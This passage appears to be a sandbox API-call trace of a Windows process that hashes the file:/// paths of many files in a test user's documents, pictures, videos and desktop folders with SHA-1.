pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.030] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.030] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/6ajwk7gtt_t6-1wj3g.odp") returned 0x52 [0086.030] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.030] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/6ajwk7gtt_t6-1wj3g.odp") returned 0x52 [0086.030] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xa6, dwFlags=0x0) returned 1 [0086.030] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.030] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.030] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/6ajwk7gtt_t6-1wj3g.odp") returned 0x52 [0086.030] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.030] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/6ajwk7gtt_t6-1wj3g.odp/") returned 0x53 [0086.030] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xa8, dwFlags=0x0) returned 1 [0086.030] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.030] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.030] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/zh5or54.jpg") returned 0x77 [0086.030] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.030] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/zh5or54.jpg") returned 0x77 [0086.030] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xf0, dwFlags=0x0) returned 1 [0086.030] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.030] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.031] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/zh5or54.jpg") returned 0x77 [0086.031] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.031] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/zh5or54.jpg/") returned 0x78 [0086.031] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xf2, dwFlags=0x0) returned 1 [0086.031] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.031] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.031] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/gyuix6ohet.swf") returned 0x40 [0086.031] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.031] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/gyuix6ohet.swf") returned 0x40 [0086.031] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x82, dwFlags=0x0) returned 1 [0086.031] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.031] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.031] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/gyuix6ohet.swf") returned 0x40 [0086.031] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.031] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/gyuix6ohet.swf/") returned 0x41 [0086.031] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x84, dwFlags=0x0) returned 1 [0086.031] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.031] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.031] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/49gdy95-0c.mkv") returned 0x40 [0086.031] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.031] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/49gdy95-0c.mkv") returned 0x40 [0086.031] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x82, dwFlags=0x0) returned 1 [0086.031] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.031] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.031] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/49gdy95-0c.mkv") returned 0x40 [0086.031] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.031] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/49gdy95-0c.mkv/") returned 0x41 [0086.031] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x84, dwFlags=0x0) returned 1 [0086.031] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.031] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.031] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/wal.gif") returned 0x84 [0086.031] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.031] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/wal.gif") returned 0x84 [0086.031] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x10a, dwFlags=0x0) returned 1 [0086.031] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.031] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.031] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/wal.gif") returned 0x84 [0086.031] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.031] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/wal.gif/") returned 0x85 [0086.031] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x10c, dwFlags=0x0) returned 1 [0086.032] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.032] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.032] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/frpgv.pptx") returned 0x37 [0086.032] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.032] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/frpgv.pptx") returned 0x37 [0086.032] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x70, dwFlags=0x0) returned 1 [0086.032] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.032] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.032] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/frpgv.pptx") returned 0x37 [0086.032] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.032] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/frpgv.pptx/") returned 0x38 [0086.032] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x72, dwFlags=0x0) returned 1 [0086.032] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.032] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.032] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/n0tkysumll.odt") returned 0x61 [0086.032] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.032] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/n0tkysumll.odt") returned 0x61 [0086.032] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xc4, dwFlags=0x0) returned 1 [0086.032] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.032] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.032] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/n0tkysumll.odt") returned 0x61 [0086.032] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.032] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/n0tkysumll.odt/") returned 0x62 [0086.032] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xc6, dwFlags=0x0) returned 1 [0086.032] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.032] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.032] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/atbj.png") returned 0x44 [0086.032] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.032] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/atbj.png") returned 0x44 [0086.032] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8a, dwFlags=0x0) returned 1 [0086.032] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.032] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.032] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/atbj.png") returned 0x44 [0086.032] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.032] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/atbj.png/") returned 0x45 [0086.032] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8c, dwFlags=0x0) returned 1 [0086.032] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.032] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.032] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/paszghjjdktqmq.png") returned 0x79 [0086.033] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.033] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/paszghjjdktqmq.png") returned 0x79 [0086.033] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xf4, dwFlags=0x0) returned 1 [0086.033] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.033] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.033] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/paszghjjdktqmq.png") returned 0x79 [0086.033] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.033] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/paszghjjdktqmq.png/") returned 0x7a [0086.033] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xf6, dwFlags=0x0) returned 1 [0086.033] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.033] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.033] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ityxkmicvrin0btq.gif") returned 0x7b [0086.033] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.033] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ityxkmicvrin0btq.gif") returned 0x7b [0086.033] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xf8, dwFlags=0x0) returned 1 [0086.033] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.033] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.033] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ityxkmicvrin0btq.gif") returned 0x7b [0086.033] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.033] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ityxkmicvrin0btq.gif/") returned 0x7c [0086.033] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xfa, dwFlags=0x0) returned 1 [0086.033] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.033] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.033] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/nonghmvfyp69p.pptx") returned 0x3f [0086.033] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.033] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/nonghmvfyp69p.pptx") returned 0x3f [0086.033] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x80, dwFlags=0x0) returned 1 [0086.033] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.033] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.033] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/nonghmvfyp69p.pptx") returned 0x3f [0086.033] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.033] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/nonghmvfyp69p.pptx/") returned 0x40 [0086.033] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x82, dwFlags=0x0) returned 1 [0086.033] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.033] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.033] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/jnes3c.rtf") returned 0x37 [0086.033] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.033] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/jnes3c.rtf") returned 0x37 [0086.033] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x70, dwFlags=0x0) returned 1 [0086.033] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.034] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.034] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/jnes3c.rtf") returned 0x37 [0086.034] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.034] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/jnes3c.rtf/") returned 0x38 [0086.034] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x72, dwFlags=0x0) returned 1 [0086.034] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.034] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.034] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/u9ror.flv") returned 0x34 [0086.034] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.034] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/u9ror.flv") returned 0x34 [0086.034] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x6a, dwFlags=0x0) returned 1 [0086.034] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.034] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.034] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/u9ror.flv") returned 0x34 [0086.034] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.034] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/u9ror.flv/") returned 0x35 [0086.034] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x6c, dwFlags=0x0) returned 1 [0086.034] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.034] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.034] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/lpldj8us8y.ods") returned 0x61 [0086.034] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.034] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xc4, dwFlags=0x0) returned 1 [0086.034] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.034] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.034] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.034] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xc6, dwFlags=0x0) returned 1 [0086.034] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.034] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.034] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.034] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xb0, dwFlags=0x0) returned 1 [0086.034] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.034] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.034] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.034] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xb2, dwFlags=0x0) returned 1 [0086.034] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.034] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.035] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.035] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x118, dwFlags=0x0) returned 1 [0086.035] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.035] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.035] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.035] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x11a, dwFlags=0x0) returned 1 [0086.035] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.035] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.035] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.035] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x74, dwFlags=0x0) returned 1 [0086.035] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.035] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.035] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.035] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x76, dwFlags=0x0) returned 1 [0086.035] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.035] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.035] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.035] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x7a, dwFlags=0x0) returned 1 [0086.035] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.035] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.035] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.035] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x7c, dwFlags=0x0) returned 1 [0086.035] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.035] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.035] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.035] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x82, dwFlags=0x0) returned 1 [0086.035] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.035] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.035] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.035] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x84, dwFlags=0x0) returned 